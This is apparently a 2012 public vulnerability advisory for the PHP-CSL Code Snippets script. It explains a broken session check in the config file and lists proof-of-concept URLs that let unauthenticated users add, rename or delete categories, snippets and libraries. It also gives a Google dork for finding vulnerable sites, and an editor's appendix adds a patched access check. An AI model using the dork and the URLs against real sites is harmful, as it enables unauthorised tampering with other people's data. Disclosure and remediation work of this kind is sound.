# --------------------------------------- #
Author      : L3b-r1'z
Title       : Code Snippets Version 0,9 insecure session
Date        : 6/30/2012
Email       : L3br1z@Gmail.com
Site        : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Powered by: PHP-CSL V0.9"
Version     : 1.1.0

[ 6/30/2012 ] - Vulnerability discovered
[ 6/30/2012 ] - Vendor contacted but no response.
[ 6/30/2012 ] - Public disclosure
# --------------------------------------- #
This PoC was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
1) Bug :

Look at the file named config, lines 120 to 138:

    if(!session_is_registered('phpcsl') && !isset($_GET['login']) && isset($_GET['act'])) {
        if(!$_GET['act'] == "session") {
            $ur = "index.php?login=y&q=".base64_encode(querystr());
            header("Location: $ur");
        }
    }

    // build URL querystring
    function querystr() {
        global $HTTP_GET_VARS;
        $q = "";
        foreach($HTTP_GET_VARS as $n => $m) {
            $q .= "$n=$m&";
        }
        return $q;
    }

This check only protects the login page. The add, edit and delete operations for snippets, categories and libraries are not protected, so an unauthenticated attacker can add snippets and can add, rename or delete categories and libraries.

Two details of the quoted code explain why. Because ! binds tighter than ==, the condition !$_GET['act'] == "session" is evaluated as (!$_GET['act']) == "session", which is false for any non-empty act value, so the redirect to the login page never fires for the actions listed below. And header() is not followed by exit, so even when a redirect is sent, whatever code follows it still runs on the server.
# --------------------------------------- #
2) PoC :

http://localhost/codesnippets/index.php?op=cats&act=add     - add new category
http://localhost/codesnippets/index.php?op=snips&act=add    - add new snippet
http://localhost/codesnippets/index.php?op=cats&act=edit    - rename category
http://localhost/codesnippets/index.php?op=cats&act=delete  - delete category
http://localhost/codesnippets/index.php?op=lib&act=add      - add new library
http://localhost/codesnippets/index.php?op=lib&act=edit     - rename library
http://localhost/codesnippets/index.php?op=lib&act=delete   - delete library
# --------------------------------------- #
<< EOF
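Editor's appendix. The block below is an added example and is not part of the original advisory or of PHP-CSL's own code: it shows the quoted check rewritten to deny by default, using the same session key 'phpcsl' and the same login/act query parameters as the page. The list of public actions, the function names, the placement in a single included file and the use of $_SESSION instead of session_is_registered() are assumptions made for the example.

```php
<?php
// Added example, not PHP-CSL's code: a deny-by-default replacement for the
// access check quoted in the advisory. Session key 'phpcsl' and the login/act
// parameters come from the original; everything else is an assumption.

session_start();

// Actions anyone may perform without a session (assumed list; the original
// only exempted "session"). Everything not listed here requires a login.
$PUBLIC_ACTIONS = array('session', 'view', 'list');

// session_is_registered() was removed in PHP 5.4; read $_SESSION directly.
function is_logged_in() {
    return !empty($_SESSION['phpcsl']);
}

// Rebuild the current query string with every key and value URL-encoded.
// The original concatenated "$n=$m&" unencoded, so a value containing
// '&' or '=' could alter the redirect target.
function querystr() {
    return http_build_query($_GET);
}

// Redirect to the login page unless the requested action is public or the
// user already has a session. Note the explicit parentheses: the original
// `!$_GET['act'] == "session"` parses as `(!$_GET['act']) == "session"`,
// which is false for any non-empty act and therefore never redirected.
function require_login(array $public_actions) {
    $act        = isset($_GET['act']) ? (string) $_GET['act'] : '';
    $login_page = isset($_GET['login']);

    if ($login_page || is_logged_in()) {
        return;
    }
    if (in_array($act, $public_actions, true)) {   // strict compare: no "0" == false surprises
        return;
    }

    $target = 'index.php?login=y&q=' . urlencode(base64_encode(querystr()));
    header('Location: ' . $target);
    // header() only queues a response header; without exit the rest of the
    // script, including the add/edit/delete handlers, would still execute.
    exit;
}

require_login($PUBLIC_ACTIONS);
```

Dropping the `isset($_GET['act'])` guard from the condition matters as much as the parentheses: with the original structure a request that omits act entirely is never checked, whereas here any request that is not explicitly public, including one with no act at all, is sent to the login page.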